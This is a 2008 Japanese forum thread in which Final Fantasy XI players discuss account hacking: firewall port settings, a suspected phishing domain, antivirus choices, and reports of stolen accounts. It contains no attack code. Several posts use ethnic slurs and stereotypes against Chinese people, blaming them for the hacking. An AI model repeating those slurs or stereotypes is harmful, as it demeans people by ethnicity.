※「61」で始まるIPは「61.195.48.0-61.195.63.255(61.195.48.0/20)」でくくってしまっても○
※FWによっては()内のIPアドレス範囲の設定の仕方を指定できるようなので、その場合()内の数値を使用すると
 設定が簡単になります。

空けているローカルポート TCP1024-65535 UDP50000-65535
空けているリモートポート TCP25,80,110,443 ,50000-65535 UDP50000-65535
※契約プロバイダによってはローカルポート UDP53番が必要になるようです(プロバイダに確認してください)
※injectionを使ってIEでもノートパッドでもエクスプローラーでもどのプロセスから送るか分からない
 ウィルスがいるため、POLをファイアウォール設定しても無意味になる可能性が高い。
250既にその名前は使われています:2008/09/10(水) 19:50:11 ID:DjGGVVPw
ノートンは、期限1ヶ月前になると毎日、契約の更新をしてくれって、
メッセイジを出すんだが、高確率でその時にPOLが落ちる。凄い嫌がらせで、
ストレスがマッハになる。ちなみにWin上から削除しても、バージョンアップの情報を
Net 上に 取りに行きます。まあ、安いソフトに買い換えました。
ハックされたら、引退しますし・・・・   ^^
251既にその名前は使われています:2008/09/10(水) 20:33:38 ID:xo3YcmtF
>>250
ハクられたら、オンラインゲーム(ジャンルを問わず)
を引退が精神衛生上一番いい。
252既にその名前は使われています:2008/09/10(水) 20:34:47 ID:TBgNt/oA
>>240は面白いな。
POL上から即ロック可能で、一週間は自分からもロック解除出来ないとかだと、
中華は気が狂ってお得意さんから殺されるだろうてwwwww
一般人なら一週間FF出来なくても何の問題もないし。
着替えとか文句言う廃人はこれを機会にゲーム止められればいいし〜
253既にその名前は使われています:2008/09/10(水) 20:37:06 ID:rGm3tcoK
引退とか言ってるのは巻き戻し恐れてる業者か?
盗品売るとかホント糞だな
254既にその名前は使われています:2008/09/10(水) 20:43:21 ID:z5+RagRS
そんなことよりウイルスバスター2009にしたら、IEにもFxにも変なツールバーが追加されたんだが?
255既にその名前は使われています:2008/09/10(水) 20:55:13 ID:9R0YN0YX
カスペこのまま発売か・・・
256既にその名前は使われています:2008/09/10(水) 21:08:50 ID:OMV7ATPV
>>180
なんかPOLで見えるオンラインフレリストにそのメアドがはいってしまった。
他と違って黒字で出てきてるんだけど…どうなんだこれ?
いまのところウイルスチェックにはかかってこんけど気になるな。
257既にその名前は使われています:2008/09/10(水) 21:14:42 ID:kkQM2u8o
たった今フレから>>219と同様のメッセが知らないやつからきたんだけどって相談があった
書かれているアドレスはwww●hugecheap●com
258既にその名前は使われています:2008/09/10(水) 21:16:32 ID:0qqdueuQ
>>245
俺も前は来なかったんだけど、最近大きな買い物を競売でやったせいかも。
259既にその名前は使われています:2008/09/10(水) 21:32:45 ID:K0KYS+0c
これからのネトゲはRMTに加えてハッキング問題が出てくるなw
260既にその名前は使われています:2008/09/10(水) 21:56:22 ID:wTUCoorm
IPアドレス 208●69.176.44
ホスト名 hugecheap●com
IPアドレス割当国 アメリカ合衆国 ( us )

Simpli Hosting, Inc SIMPLI-1 208●69.176.0 - 208●69.183.255
China Clastar VLAN-29 208●69.176.40 - 208●69.176.47
261既にその名前は使われています:2008/09/10(水) 22:13:33 ID:9R0YN0YX
クレジットカードの不正使用による損害に対し、年間 100万円を限度に補償が
262既にその名前は使われています:2008/09/10(水) 23:09:37 ID:CYFgzgAe
263既にその名前は使われています:2008/09/10(水) 23:54:48 ID:uBRXjTEd
ほしゅ
264既にその名前は使われています:2008/09/11(木) 00:26:17 ID:tcL4n8t8
>>250
>>251
死ねシナチク
265既にその名前は使われています:2008/09/11(木) 00:37:15 ID:vhL2YUaz
おやすみ前のあげ
266既にその名前は使われています:2008/09/11(木) 00:42:07 ID:bkJux1NC
まさか自分もアカハックされるとは・・・、2日前からおかしいいなと思ってたけど
267既にその名前は使われています:2008/09/11(木) 00:46:15 ID:VJ4pGtb8
>>250-251
中国狗?
268232:2008/09/11(木) 00:48:14 ID:cF7FX+mB
コンピュータ名、ユーザ名、IPアドレス、接続されたハードウェア等
アクセスしているPCを識別する情報はいくつもあるから、それらを組み合わせて記憶し、
たとえパスワードを盗まれてもアクセスできないように、
■指定された端末以外からはアクセスを禁止する
という設定ができればいいと思う。

その場合、識別情報を変更するときが問題になるが、
設定変更のためのパスワード発行依頼をするページを作り、
登録されているメールアドレスにそれが届くようにする。
パスワードじゃなくても、登録URLを記載してもいい。
インターネットのユーザー管理ではよく行われていることだよ。
269既にその名前は使われています:2008/09/11(木) 00:56:54 ID:cF7FX+mB
↑ちょっと方向性変わったが、いかなる方法でハックされても
同じ環境を作るのが難しいものをかんがえてみた。
ちなみに、データはしっかり暗号化してくれよ>■e
270既にその名前は使われています:2008/09/11(木) 00:58:08 ID:bkJux1NC
●今日の0時30分
●2ヶ月ほどインしてなくて日曜日に久々にインしただけ。ネットはアメーバブログや2ch、ニコニコ、他
●他人が貴方のIDを使用したことが一度でもあるか No
●ID・Passの認証方法 ずっとPOLに保存/自動ログイン
●Pass変更の履歴 したことない
●他人が貴方のPCを使う可能性の有無 自分オンリー
●ツールの使用の有無: なし
●ネットカフェの利用の有無: No
●使っているOS Win XP SP2 4日前にSP3に変えた。
●使用ブラウザ 火狐3 時々IE7 
●WindowsUpdateの有無 毎月小まめにUPしてた。
●FlashPlayerとRealPlayerのバージョン 最新だと思う。
●アンチウイルスソフト Avaist
●その他のSecurty対策 なし
●ウイルススキャン結果 spybotで4匹削除
●スレログやテンプレを読んだか 日曜日読んでspybot入れた polからFF11に移行する時必ず落ちるのでおかしいと思ってた。
Vupの不具合かと思ったが念のため、HDD入れ替えてOSインストしてPOL立ち上げたらいつものIDが無効に成ってた;;

今から解約中のもう1アカで事情説明してくる
271既にその名前は使われています:2008/09/11(木) 01:04:01 ID:j680cTnq
> 最新だと思う。

バージョンを確かめてみましたか?
272既にその名前は使われています:2008/09/11(木) 01:48:40 ID:Lh4I3yVK
>>270
・Spybotで検出された4つのウィルスの名前はなんでしょうか?
・FirefoxはFirefox3ですか?
・NoScriptは入れてましたか?

>>268-269
パス盗まれるような状況ならハード等のPCを識別する情報も盗めるわけで、
そんなことをしても意味は全くない。
それよりWoWのAuthenticatorと同様なものを入れる計画があるからそれが入ればOK。
273既にその名前は使われています:2008/09/11(木) 01:51:06 ID:G8I8Q8+3
>>268
普段とプロバイダが違うとアクセス不可でいいよ、もう。
274272:2008/09/11(木) 01:55:16 ID:Lh4I3yVK
嘘を言ってしまったかもしれないので自己レス

> パス盗まれるような状況ならハード等のPCを識別する情報も盗めるわけで、
> そんなことをしても意味は全くない。

同じ環境を作る必要はなくて認証の際にこの情報を詐称できる、と思うけど
もし詐称不可能な情報を作ることが可能なら意味はありますね。

Authenticatorの方がお手軽かつセキュリティ強度も高いけど。
275既にその名前は使われています:2008/09/11(木) 01:57:48 ID:Rs7EDT7N
> 最新だと思う。
いっつもコレが引っかかってるパターンなんだよな
276既にその名前は使われています:2008/09/11(木) 01:58:57 ID:Lh4I3yVK
>>273
どのプロバイダに接続していることは簡単に認識可能だし、
中国からVPNを使ってそのプロバイダ経由でアクセスすることも簡単。

つーか中国からのアクセスを既に遮断しているのに、アカハックが
続いているってことは、現時点でSoftetherのようなVPN経由で
日本のプロバイダを通してアクセスしているはず。

マイナーなプロバイダに入ってる人は多少守られるかもしれないけど
わりと微妙な嫌がらせにしかならない。
277既にその名前は使われています:2008/09/11(木) 02:29:40 ID:1ZBre3UU
>>271
HDD入れ替えましたので、今はバージョンの確認取れないです。
>>272
名前までは・・とにかく削除しました。
FirefoxはFirefox3です
NoScriptは入れてません、今は怖いので入れています。

GMにメールしました。不正アクセスの確認が取れたので、アカウントのログイン停止中とのこと。
明日不正アクセス専門チャットで詳しい被害聴いてきます・・
278既にその名前は使われています:2008/09/11(木) 02:30:09 ID:HQ2VK7C2
日本国内にも中国人が多数居る訳だから、
垢ハック対策で中国「から」のアクセス遮断しても無意味でしょ。
279既にその名前は使われています:2008/09/11(木) 02:38:35 ID:dtazaj62
>>278 業者のネガキャン乙。
日本国内なら法で裁けると何度言われたら(ry

テンプレに無いみたいだから、いちおFlashPlayerのバージョンテストページのアドレス置いとくねー。
ttp://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
280既にその名前は使われています:2008/09/11(木) 03:07:13 ID:p+N5/k40
>>279
テンプレサイトにあります
そっちを見ていただければじゅうぶん
281既にその名前は使われています:2008/09/11(木) 03:20:08 ID:p+N5/k40
スクエニからニュースレターが来てた
5年FFにいて初めて来たんだけどこれ・・・

テキストでしか受け取れない仕様にしてるからどんなリンクが
張られてるのかわからないけど、大丈夫なものかどうか・・・
282既にその名前は使われています:2008/09/11(木) 03:21:59 ID:Rs7EDT7N
ニュースレターは3月のBAのときとかも来てたよ
283既にその名前は使われています:2008/09/11(木) 03:24:41 ID:p+N5/k40
>>282
ありがとうございますm(_ _)m
時期が時期だけに、ちょっと過敏になりすぎてる
284既にその名前は使われています:2008/09/11(木) 04:25:25 ID:5xYM1Hf3
NoScriptいれてないFireFoxになんの意味が・・・
285既にその名前は使われています:2008/09/11(木) 04:51:48 ID:5i89qXwP
>>278.279
遮断する意味はある
遮断すれば遮断したぶんのこうかはある
完璧ではないし、遮断することは本来普通の対応じゃないか?

>>284
色んな意味でちょっと敏感になりすぎ
大きな事故がありそうな、最近そんな気がしている。
286既にその名前は使われています:2008/09/11(木) 06:31:27 ID:caW3dXW+
age
287既にその名前は使われています:2008/09/11(木) 08:09:29 ID:K/X7cBjW
深夜数時間Vanamon繋がらなかったけどまた何か改ざんされてんだろか。
288既にその名前は使われています:2008/09/11(木) 08:30:06 ID:OsiGRecJ
1年ぶりに復帰しようとしたら
IDかパスが違うと言われて
POLにログインできなくなってたんだけどやられたかな?
他の心当たりとしては去年行われたセキュリテイ強化の際
パスを変更せず5桁のまま放置したことです
289既にその名前は使われています:2008/09/11(木) 08:38:20 ID:FcDVHQTI
ヴァナモンをソースチェッカーで調べてみたが、問題は無かったな
油断しないに越したことは無いが
290既にその名前は使われています:2008/09/11(木) 10:35:28 ID:m4an2tNo
age
291既にその名前は使われています:2008/09/11(木) 11:27:18 ID:XFMRxvvi
さがってきた
292既にその名前は使われています:2008/09/11(木) 11:27:48 ID:45qtTbJq
>>288
とりあえずウイルスチェックやソフトの更新確認を
293既にその名前は使われています:2008/09/11(木) 11:30:47 ID:XEqKrORb
保守ついでの質問
俺は半年間ログインしていないんだが(カード決算・自動ログイン)
たとえウィルスに感染していたとしても、ログインしなきゃ抜かれることはないのだろうか?
294既にその名前は使われています:2008/09/11(木) 11:35:38 ID:i61RPvcE
すでに抜かれていなければ大丈夫なんじゃない
PS2か箱でログイン出来るか試してみるのが良い
295既にその名前は使われています:2008/09/11(木) 11:36:14 ID:Q7izZchq
それに答えられるやつはいない
296既にその名前は使われています:2008/09/11(木) 11:46:58 ID:9zOKc/RD
FFXIに限ればログイン時かログイン後に抜くのが普通だから
ログインしなけりゃ抜かれる可能性は低いだろうな

・引退前に抜かれてた
・弱いパスワードを使ってた
・他のサービス(ゲーム)と同じパスワードを使ってた
・実はログインしてた

復帰したら垢ハックされてた奴は大抵このパターンのどれか
297既にその名前は使われています:2008/09/11(木) 12:02:28 ID:7JlXYsuA
アカハックされた奴はPOLのメールパスも抜かれてるから注意な
298既にその名前は使われています:2008/09/11(木) 12:11:17 ID:XEqKrORb
げ、今ログインしちまったwww>PC
リアルプレイヤー今現在使用中なんだが、消さんとやばいんか
なんだかちょっと入らない間にいろんなことが・・・浦島状態だわw

299既にその名前は使われています:2008/09/11(木) 13:33:51 ID:xuzNbxr8
>>298
ログイン時に変な挙動起きてない?
おきなかったら多分大丈夫だと思う。
私も同じようにPCからの起動は(ウイルス騒動があってから)してないけど、
PS2から起動して半年、まだ取られて無い。
300既にその名前は使われています:2008/09/11(木) 13:38:17 ID:xuzNbxr8
>>287
繋がらないなら向こうの鯖がメンテだっただけじゃない?
もしくはすでに自分のPCが(ヴァナモンに入る前から)ハック受けてる場合もあるけど。
301既にその名前は使われています:2008/09/11(木) 13:48:32 ID:j680cTnq
閲覧数が多いとテンポったりするよね、ヴァナモン
302既にその名前は使われています:2008/09/11(木) 15:32:46 ID:ARnf7grN
age
303既にその名前は使われています:2008/09/11(木) 15:52:42 ID:s5ocxpYk
>>288
今はパスは7桁以上でないとダメになってる。
サポセンが仮パスだしてるのかも、聞いてみそ。
304既にその名前は使われています:2008/09/11(木) 16:55:08 ID:PdV0Qmi8
今インしようとしたら、パスワードかIDが違いますと言われ(3回)
不正アクセスチャットに新しいID教えてもらって入ったけど
何も変わってなかった、これって後で入ろうとしてパス変えたのかな?
305既にその名前は使われています:2008/09/11(木) 17:03:47 ID:PTBgsPCV
おい待て まさかとは思うが何の対策もせずに入ったのか?
だとしたら極上の馬鹿だが・・・  まさかな


>>2のテンプレよろ
306既にその名前は使われています:2008/09/11(木) 17:04:51 ID:4ZctM1eJ
>>304
とりあえずハックして即パス変えたが
キャラ資産見たら微妙だったので
高額アイテムがある垢を先にやって暇な時にでも取るか
という感じかもしれん
307既にその名前は使われています:2008/09/11(木) 17:13:19 ID:i61RPvcE
>>306
想像して噴いたw
俺のも何も取られていなかったけど気味が悪かったんで課金停止してウェブマネに変更した
ところで業者ってパス抜いて課金停止されている垢だったらわざわざ課金するもんなの?
308既にその名前は使われています:2008/09/11(木) 17:18:34 ID:Eeg7wxJ9
新しいID教えてもらえる時代になったのかw
309既にその名前は使われています:2008/09/11(木) 17:19:21 ID:PdV0Qmi8
なんかどうでも良くなったからそのままインした。
>>306
>>306
そっか納得^^
310既にその名前は使われています:2008/09/11(木) 17:22:39 ID:+/20YCgs
>>307
するんじゃね
大金持ったままフェードアウトした連中もいるんだろうし
なにもなかったらそのまま寝釣りに利用する手もある
311既にその名前は使われています:2008/09/11(木) 17:43:21 ID:zmOEx7Pk
>>306
【FF11】垢ハク復旧頼んでみたが【垢ハク】
ttp://www.23ch.info/test/read.cgi/ogame/1220247286/

こういうハックされたけどスルー→その後高額アイテム持ってたら奪取
って例もあるみたいだから気をつけてな
312既にその名前は使われています:2008/09/11(木) 17:49:23 ID:99TNnVHj
>>258
あ、なるほど・・・。
自分も今まで来なかったけど、最近高額アイテムを買ったわ。
313既にその名前は使われています:2008/09/11(木) 17:52:57 ID:99TNnVHj
>>307
ニコニコでハックされた人の動画が出てたけど、課金停止してたのに
課金されてアイテムをとられたらしいよ。
314既にその名前は使われています:2008/09/11(木) 17:55:01 ID:+/20YCgs
ペンギン村の住人だけど
不正アクセスの調査依頼で免許証コピー送ったら
なんとか本人確認とってもらえたよ

ナメック星人とかの人朗報
315既にその名前は使われています:2008/09/11(木) 17:55:54 ID:+/20YCgs
ほんとかよって声があればメール貼るぜ
316既にその名前は使われています:2008/09/11(木) 18:21:56 ID:5v4Z3jdk
ちょびっと興味深い話し

ttp://blog.livedoor.jp/yoshy2k7/archives/51205984.html
417.カード不正利用
私のクレジットカードが他人に不正利用された。
夜中にカード会社から電話がかかってきた。
【会社】 ゲームに使うためネットでカード番号を入力したか?
・・・
【会社】 ランダムにカード番号を入力して一致したものを使っているようだ。
317既にその名前は使われています:2008/09/11(木) 20:23:04 ID:bFHLNMYn
266からあげ
318既にその名前は使われています:2008/09/11(木) 21:23:25 ID:Ha8stJ0P
229からあげ
319既にその名前は使われています:2008/09/11(木) 21:49:48 ID:+/20YCgs
パス再発行でインしたら
英語でPOLGM呼んだあとっぽいメッセージが
大量に残ってた
凍結解除しようとしてあれこれ試したのかな
320既にその名前は使われています:2008/09/11(木) 22:06:41 ID:j680cTnq
外人にアカウント売られていたんじゃないかと勝手な予想
321既にその名前は使われています:2008/09/11(木) 22:20:49 ID:+/20YCgs
たしかに英語圏のやつぽかったなー
メイン垢でtellしたとき
322既にその名前は使われています:2008/09/11(木) 22:43:46 ID:EpeQPks0
>>313
ベジータ王子の動画結構好きだったから、かわいそうだわ。
でもウイルス対策とかもしてなかったみたいだし油断しすぎだわw
323既にその名前は使われています:2008/09/11(木) 23:03:16 ID:99TNnVHj
>>322
自分も好きw
でもウィルス対策はしないといかんよな。
自分が発信源になることもあるわけだから、自分一人の問題じゃない。
324既にその名前は使われています:2008/09/12(金) 00:40:49 ID:MQYhm9PP
251からあげ
325既にその名前は使われています:2008/09/12(金) 00:44:00 ID:3aUk2teY
>>314
免許証送ったなら向こうでなんとかできるからな。
IPから日本かどうか、IP管理者から実在する人間かどうか確認出来る。

中華だと、名前は偽者を名乗るのが文化だとかぬかす人種だから、カットしやすいしなー
326既にその名前は使われています:2008/09/12(金) 00:58:17 ID:9yQHNikc
かちゅの板更新に、いつもhimajin氏のサイトから更新ファイルを落として
使わせてもらってるけど、サイトxreaだったのね。
tp://hima2908●s151●xrea●com/
ここだけど、素人なりにチェックしてみたけど大丈夫だよね?
インラインでamazonがいくつかあるけど。
と言ってもブックマークから操作ミスって既に飛んじゃって、すぐ戻ったけど
ヤバかったら意味無いか・・・
327既にその名前は使われています:2008/09/12(金) 01:02:50 ID:7LiaMaq/
>>326
俺もざっとみただけだけど改竄とかはされてなさそうだから大丈夫だとは思う
328既にその名前は使われています:2008/09/12(金) 01:05:17 ID:bB0R8IyJ
お休みまえのあげ。
329既にその名前は使われています:2008/09/12(金) 02:04:08 ID:jQaHkKit
age
330既にその名前は使われています:2008/09/12(金) 03:31:40 ID:QkwajA+Y
俺PS2だけどageといてやるよ
おやすみ
331既にその名前は使われています:2008/09/12(金) 06:21:53 ID:jQaHkKit
age
332既にその名前は使われています:2008/09/12(金) 08:24:35 ID:Iho4geVS
COMODO導入したのですが、Norton360のファイアーウォールOFFは当然しますよね
でもあの赤い警告がそわそわしちゃうので、ONにしてみました。
今のところ競合したりとか、異常な動作は視覚的に現れてませんが、そのまま使い続けていいと思いますか?
ご意見をお願いします。
333既にその名前は使われています:2008/09/12(金) 08:30:16 ID:UX8T04K+
せめて質問する時は上げないとw 293で維持させちゃダメ!まぁ私は答えられないんですけどね;;
334既にその名前は使われています:2008/09/12(金) 10:04:06 ID:1XGBijbv
>>332
致命的
335既にその名前は使われています:2008/09/12(金) 10:09:18 ID:rbwpXCR4
>>332
そういうのが判断できないうちはCfpはお勧めしないよ。
Cfpはセキュリティレベル設定によって超甘いか超五月蝿いか割りと両極端なアラート出してくるからね。
それを自分の環境に合わせて設定することによって初めてCfpは堅いですね。ってことになるわけで。

インスコのときに他のと同時に使ったりすると不具合でるかもよ?って言われたしょ。
そういうことです。
336既にその名前は使われています:2008/09/12(金) 10:50:40 ID:myX8b7c7
こんなのまで出始めてるから注意

マルウェア配布が目的:YouTubeの偽サイトを作るアプリ出現
http://www.itmedia.co.jp/enterprise/articles/0809/12/news021.html
337既にその名前は使われています:2008/09/12(金) 10:55:51 ID:4nCryUol
こんなのまでツールキットになってんのかw
手抜きもいいとこだな。

>Flash Plyayer
338332:2008/09/12(金) 11:31:21 ID:Iho4geVS
COMODOまとめサイトに書かれてる手順とセキュリティレベル設定以上の高度なことはまだできないなぁ
Excite翻訳しながら、設定していくのはなかなか骨が折れる。
しかしFFしてるとIPごと、ポートごとに設定できて、強固なのはなんとなくわかる
339既にその名前は使われています:2008/09/12(金) 13:07:06 ID:8xJA9wPb
勝手にフレ登録が増えてたw
外人に売ったのかなw
340既にその名前は使われています:2008/09/12(金) 13:07:11 ID:36U0corC
age
341既にその名前は使われています:2008/09/12(金) 13:10:33 ID:bBQO6Ttz
http://gigazine.net/index.php?/news/comments/20080912_windows_7/
マイクロソフト、最新OS「Windows 7」のベータ版を年内に提供か

セキュリティ面向上するといいな
342既にその名前は使われています:2008/09/12(金) 13:11:20 ID:4p2ynmLS
>>336
>出来上がったページは本物のYouTubeそっくりのデザインで、
>例えば「Flash Plyayerの最新版が必要です」などのメッセージを表示してユーザーをだまし、
>プラグインをインストールするように偽装しながらマルウェアに感染させることができるという。

もしNoscriptの警告に偽装されてたらうっかり押しちゃうかもしれない
怖いな
343既にその名前は使われています:2008/09/12(金) 13:13:51 ID:wS4e0PtR
>>341
Vistaベースだからな

 管理者権限の上、超管理者権限が実装。
 ファイルを削除します。宜しいですか?
 あなたは管理者ですか?
 ファイルを削除します。本当に宜しいですか?
 本当の本当の本当によろしいですか?
 削除したら元に戻せないかもしれませんが、いいんですね?

 ファイルをごみ箱に移動しました。


とかいうセキュリティ強化をやってくるかもしれんな。
344既にその名前は使われています:2008/09/12(金) 14:38:37 ID:qiw6A5vO
>>343
垢ハックが怖いからVistaに戻したんだがwindowsの起動に5分とかシャレにならん
345既にその名前は使われています:2008/09/12(金) 15:34:13 ID:0AXG+Wk9
アカハックがこんなに蔓延してるのに
スクエニときたらファイナルファンタジーXIを推奨PCでプレイしよう
っていうメールを送りつけてきた件について。
346既にその名前は使われています:2008/09/12(金) 15:50:00 ID:wS4e0PtR
>>345
FF推奨PCが売れる=スクエニすごい!と店に喜んでもらえる、だな。
347既にその名前は使われています:2008/09/12(金) 16:00:19 ID:elOTXlfA
>>345
このスレ的な解釈をすると
「FF専用のPCを用意してね!」
ってことだと思う(´・ω・`)
348既にその名前は使われています:2008/09/12(金) 16:19:37 ID:qiw6A5vO
むしろ■が専用機用意すりゃいいんじゃね
349既にその名前は使われています:2008/09/12(金) 18:03:38 ID:ctRROkpk
ノートンの新しいやつはカスペの様に垢ハックウィルスに全て対応したんかな?
350既にその名前は使われています:2008/09/12(金) 18:07:53 ID:w8fbYgAb
>>345
そのFF推奨PCで垢ハックされて引退したんだが・・・
351既にその名前は使われています:2008/09/12(金) 18:13:23 ID:m27nO+Gl
スレ読んでると、カスペと仮想環境の普及率高いような錯覚に落ちるw
>>349
カスペがすべて対応しているとは初耳。というかその誤解が怖いw
>>350
スペックとセキュリティは別物ですよ。
352既にその名前は使われています:2008/09/12(金) 18:21:00 ID:oCiXY7yb
>>350
■e>FF推奨PCでFF以外のことをやるな
353既にその名前は使われています:2008/09/12(金) 18:49:43 ID:x5dFcNCB
昔のワープロ専用機みたいな、FFを専用機を■が販売するとかw
High5000ぐらいの性能でいいなら、いまなら4,5万あればおつり来るよね?
354既にその名前は使われています:2008/09/12(金) 19:13:32 ID:zTMuUFTl
もしかしてPS2ってFF専用機に最適なんじゃね?
355既にその名前は使われています:2008/09/12(金) 19:14:09 ID:rZ+wnkVp
いまごろかよ
356既にその名前は使われています:2008/09/12(金) 19:15:42 ID:dFgx+tOc
PS2は画面がもう少し広ければ良かったんですけどね・・・・
357既にその名前は使われています:2008/09/12(金) 19:42:01 ID:x2kDK6fK
>>356
画像ってPCに取り込めると思ったけど
どこかで読んだ気がするんだけど違ったかな
358既にその名前は使われています:2008/09/12(金) 19:42:47 ID:Ebh+eCiA
買う人間が馬鹿だからだろ?
お水系馬鹿が元ヤンりようしwにせがまれてメールできた物をブランド感覚で買いまくり。
そして気に入らなければポイ。
それを実働でしている■もカス会社としか言いようが無いがな。
359既にその名前は使われています:2008/09/12(金) 19:55:55 ID:x2kDK6fK
>>358
日本語でおk
360既にその名前は使われています:2008/09/12(金) 20:10:16 ID:OynP6vdc
ヤベ ホントにわかんねぇんだけど・・・
解説プリーズ
361既にその名前は使われています:2008/09/12(金) 20:11:58 ID:aON4awQd
>>354
PS2はもう少しで終わるんじゃなかった?
今PC使っているならすぐ戻ってくるわけだし×箱かPCセキュリティ強化がいいと
362既にその名前は使われています:2008/09/12(金) 21:52:33 ID:nfW0g89O
ほしゅ
363既にその名前は使われています:2008/09/12(金) 21:58:09 ID:v0fCe7WV
>>361
出来ればPS3専用クライアント出して欲しけれど
箱○でのラインナップみると絶望的だよな・・・FF13シリーズで
成功して翻意してくれると良いのだけれど・・・

まぁ最悪箱○に力入れて快適に動く様になったら箱○に移るけれどw
364既にその名前は使われています:2008/09/12(金) 23:06:33 ID:3aUk2teY
>>363
喧嘩売る訳じゃないけど…どう絶望的だと思った?

確かに今箱〇じゃ、日本人が好みそうなゲーム作られては無いけど。
これは、海外向けに出した方が、カス当たりでも最低10万は保証されてるからなんだよねー
だから、多分貴女が抱いている今後発売されると思ってるゲームは今後一生発売されない可能性もあるんだけど…

一応それを踏まえた上で、どう絶望的か聞かせて欲しい。
365既にその名前は使われています:2008/09/12(金) 23:11:41 ID:5MuBSByb
>>363
箱○はアメリカ人向けのを、無理やり日本人向けに
したようなもんだから
PSシリーズと比べるのはどうかと思うがw
366既にその名前は使われています:2008/09/12(金) 23:26:05 ID:17bPOMtW
かなり初歩的な意味が判らない;

「PS3で出して欲しいけど
箱○で出ているゲーム各々を見てみると
それは絶望的だ」

って事なんだね?
箱○のゲームを見て…ってあたりの事情がよく判らない;
367既にその名前は使われています:2008/09/12(金) 23:31:17 ID:HLDif1KB
PS3でできるFFXI出して欲しい。
X箱360のほうはやりたいゲームでてないし。
ということだとおもわれ。

X箱360は中国の工場で故障率バツ牛ンらしいし。
368既にその名前は使われています:2008/09/12(金) 23:42:24 ID:17bPOMtW
なるほど

外人で垢ハック対策でPCから×箱に乗り換えた人物も居ると
このスレで見たことがあるけど
そうは行かない人も多いだろうな(自分もそうだし

すると今度はその後どうして
喧嘩を売られてるのか判らないな

「海外向けに出した方が売れるからなんだよ〜
だから×箱で目ぼしいタイトルが出る可能性は
薄いんだよね〜
で、なんで絶望的なの?」

って言ってるんだよね?
どゆこと?
369既にその名前は使われています:2008/09/13(土) 00:26:00 ID:fNmU3CKT
おやすみまえのあげ。
370既にその名前は使われています:2008/09/13(土) 00:29:14 ID:dgWR6L9Z
■eのラインナップがPS3より箱優先(FF13の件もあったしの)に映るから
このままの路線だとPS3版が開発されるのは絶望的に思える ってことじゃないのかい
371既にその名前は使われています:2008/09/13(土) 00:33:50 ID:an3zT+oK
>>370
次世代MMOをPS3で開発中なんだろね。
FF13商法のシリーズの一つが次世代MMOだったりしてw
372既にその名前は使われています:2008/09/13(土) 00:34:09 ID:qCglIX7j
>>370
ハイ、そんな所です。拙くて御免なさい。
373既にその名前は使われています:2008/09/13(土) 01:06:28 ID:ZRsMcFiw
おやすみage
374既にその名前は使われています:2008/09/13(土) 01:38:37 ID:+Z61/tOb
アプリケーション:LuComSever_3_4.EXE
送信先IP:60.254.130.24:HTTP
25280.ftp□download2□akadns
というところにアクセスしよとするのですが。これは大丈夫なのでしょうか?
何のプログラムがアクセスしようとしているのがわからないのが現状です(´・ω・`)
本日から急に発生しました。
最近インスコしたプログラムもないのになぁ…
375既にその名前は使われています:2008/09/13(土) 01:44:43 ID:5O7r5QnG
>>374
シマンテック製品のLiveUpdate関係っぽい
376既にその名前は使われています:2008/09/13(土) 01:52:52 ID:+Z61/tOb
>>375
即の回答ありがうございます。
たしかにパソコンにはノートンが入っております、ただ気になる点は…いままでこのようなアクセス要求がなかったため…
377既にその名前は使われています:2008/09/13(土) 01:56:41 ID:AegNeeiB
>>376
なにかほかにセキュリティに関係するソフトは入れませんでしたか?
378既にその名前は使われています:2008/09/13(土) 02:00:24 ID:GgE1Nccy
ノートンの自動更新によって、LiveUpdate関係に変更があったということではにぃのか
379既にその名前は使われています:2008/09/13(土) 02:07:43 ID:+Z61/tOb
>>377
ここ数日で追加したセキュリティーソフト関連等はありません(;´д`)
>>378
カスペオンラインで検索かけたところ現時点での結果は白でした…ノートンのアップデート方式が変更されただけなのかなぁ…この週末だけに、不安が(´・ω・`)
380既にその名前は使われています:2008/09/13(土) 02:27:46 ID:AegNeeiB
>>379
ファイアウォールの処理の仕方は自動(推奨)になっていますか?
判断できなければ自動にしておいたほうが無難ですよ
381既にその名前は使われています:2008/09/13(土) 02:41:59 ID:+Z61/tOb
>>380
ファイアウォールはウィンドウズとノートンにてオンになっております。
またノートンのホムペ閲覧しようとするとなぜかPGにて香港 中国が反応しちゃうのですが…(;´д`)
382既にその名前は使われています:2008/09/13(土) 02:52:28 ID:AegNeeiB
>>381

>>374の反応は、Windowsのほうでしてきた反応ですか?

↓シマンテックの日本語HP
ttp://www.symantec.com/ja/jp/index.jsp

中国IPを弾くのは、サポートかなにかにつなぎにいってませんか?
シマンテックのサポートは中国です(わたしもそれでかなり悩みました)
383既にその名前は使われています:2008/09/13(土) 03:06:53 ID:AegNeeiB
>>381
結論から言いますけど、LuComSever_3_4.EXEはノートン360のLiveUpdateだから
動作的には問題ないです↓

ttp://service1.symantec.com/SUPPORT/INTER/nisjapanesekb.nsf/0/49256b02002655fd49256b8e0043d791?OpenDocument

ファイアウォールはあまりいくつも立てると問題が起きますから、ノートンが
オンになっているのならWindowsのほうはオフにしたほうがいいと思います

慌てるより先にいろいろ出てきた情報をもとにして検索してみるとけっこう
答えはウェブに落ちているものですよ
落ち着いて探してみましょう
言葉をきつくして言いますけど、自分の環境を自分で把握できないようでは
セキュリティのセの字にもなりません
384既にその名前は使われています:2008/09/13(土) 06:54:42 ID:ofhyBUvM
age
385既にその名前は使われています:2008/09/13(土) 07:04:45 ID:rYN3tvtC
sage
386既にその名前は使われています:2008/09/13(土) 07:56:08 ID:tl+y3k8G
特に気にしていなかったセキュリティ
たまたまたどり着いたここを見てセキュリティ関連のソフトをいくつも入れた。
完璧なので狙ってここには来ない。
コンクリフトが発生するのでFFXIプレイ中は停止させることが多い。

今そんな奴が多数いるのだろうか。
387既にその名前は使われています:2008/09/13(土) 08:47:26 ID:Vl1LQu7i
>>370->>372
情報・解説ありがとう

ウィルスってのは「油断」じゃなくて
「もののはずみ」で感染するから
(うっかり添付ファイルを触ってしまった、その気も無いのにURLを踏んでしまった
普段からの注意喚起と対策が必要だぁね〜
388既にその名前は使われています:2008/09/13(土) 09:34:26 ID:+Z61/tOb
>>383
こんなページがあったなんて…自分でも探したつもりだたのに。ほんとありがとうございました。
389既にその名前は使われています:2008/09/13(土) 12:29:59 ID:de5c2sQ1
保守
390既にその名前は使われています:2008/09/13(土) 13:14:45 ID:kdH2Vpxf
※通報スレとのマルチポスト失礼

Kujata

白門で装備品バザーシャウトを繰り返しているSiloxというキャラクターが
ハックされたアカウントの可能性が高い。装備品を軒並みバザーしている。
GMコールにて本人確認を養成しているので、支援お願いします。
